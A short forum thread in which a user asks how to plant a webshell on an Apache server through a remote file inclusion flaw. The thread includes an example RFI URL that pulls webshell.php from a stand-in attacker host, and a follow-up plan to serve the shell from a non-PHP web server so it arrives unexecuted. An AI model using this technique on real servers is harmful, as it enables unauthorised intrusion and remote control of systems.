TruePentest
-
Posts
2 -
Joined
-
Last visited
Posts posted by TruePentest
-
-
Hello guys,
Anyone can tell me how to download a webshell.php file on an apache server through a remote file inclusion vulnerability without executing the php file ? I can initiate a remote file inclusion coming like this http://victim_machine/file.php?src=http://attack_machine/webshell.php but the server apache execute the webshell.php file before dowloading it. So when I try to read it on the victim machine there is nothing inside... Thank you
Webshells from remote file inclusion
in Questions
Posted
indeed. I am thinking of hosting my webshell on a simple http server without php so that it will be downloaded as it is. Thank you for your reply.